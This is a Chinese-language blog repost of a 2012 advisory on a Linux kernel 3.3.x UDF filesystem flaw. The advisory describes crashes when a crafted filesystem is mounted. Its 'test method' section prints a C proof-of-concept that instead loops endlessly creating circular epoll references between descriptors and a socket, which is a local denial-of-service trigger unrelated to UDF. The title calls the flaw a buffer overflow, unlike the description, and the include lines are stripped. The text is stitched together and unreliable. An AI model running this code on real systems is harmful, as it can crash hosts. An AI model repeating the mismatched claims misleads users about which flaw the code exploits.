linux识别UDF文件系统吗,Linux Kernel UDF文件系统本地缓冲区溢出漏洞
發布日期:2012-07-04
更新日期:2012-07-05
受影響系統:
Linux kernel 3.3.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ? ID: 54279
Linux Kernel是Linux操作系統的內核。
Linux Kernel在實現上存在兩個錯誤,可被利用造成較高的CPU消耗,導致本地拒絕服務。
1)在加載備用表時存在錯誤,當加載特制文件系統時可造成崩潰。
2)在處理分區表時,"udf_load_logicalvol()"函數(fs/udf/super.c)中存在錯誤,當加載特制文件系統時可造成崩潰。
)
Jan Kara
鏈接:http://secunia.com/advisories/49742/
*>
測試方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!
Yurij M. Plotnikov ()提供了如下測試方法:
#include
#include
#include
int
main ()
{
struct sockaddr_in addr;
struct epoll_event event;
int epfd1, epfd2, sock;
int rc;
int i = 0;
while (1)
{
printf("ITERATION %d\n", ++i);
epfd1 = epoll_create(1);
printf("epoll_create() -> %d(%d)\n", epfd1, errno);
epfd2 = epoll_create(1);
printf("epoll_create() -> %d(%d)\n", epfd2, errno);
sock = socket(PF_INET, SOCK_STREAM, 0);
printf("socket() -> %d(%d)\n", sock, errno);
addr.sin_family = AF_INET;
addr.sin_port = 0;
addr.sin_addr.s_addr = 0;
rc = bind(sock, (struct sockaddr*)&addr, sizeof(addr));
printf("bind() -> %d(%d)\n", rc, errno);
rc = listen(sock, 1);
printf("listen() -> %d(%d)\n", rc, errno);
event.data.fd = sock;
event.events = 0;
rc = epoll_ctl(epfd1, EPOLL_CTL_ADD, sock, &event);
printf("epoll_ctl() -> %d(%d)\n", rc, errno);
event.data.fd = epfd2;
event.events = EPOLLIN;
rc = epoll_ctl(epfd1, EPOLL_CTL_ADD, epfd2, &event);
printf("epoll_ctl() -> %d(%d)\n", rc, errno);
event.data.fd = epfd1;
event.events = EPOLLIN;
rc = epoll_ctl(epfd2, EPOLL_CTL_ADD, epfd1, &event);
printf("epoll_ctl() -> %d(%d)\n", rc, errno);
rc = close(epfd1);
printf("close(epfd1) -> %d(%d)\n", rc, errno);
rc = close(epfd2);
printf("close(epfd2) -> %d(%d)\n", rc, errno);
rc = close(sock);
printf("close(sock) -> %d(%d)\n", rc, errno);
sleep(1);
printf("\n\n");
}
return 0;
}
建議:
--------------------------------------------------------------------------------
廠商補丁:
Linux
-----
目前廠商已經發布了升級補丁以修復這個安全問題,請到廠商的主頁下載:
總結
以上是生活随笔為你收集整理的linux识别UDF文件系统吗,Linux Kernel UDF文件系统本地缓冲区溢出漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: python里pip是什么意思_pyth
- 下一篇: 训练集山准确率高测试集上准确率很低_推荐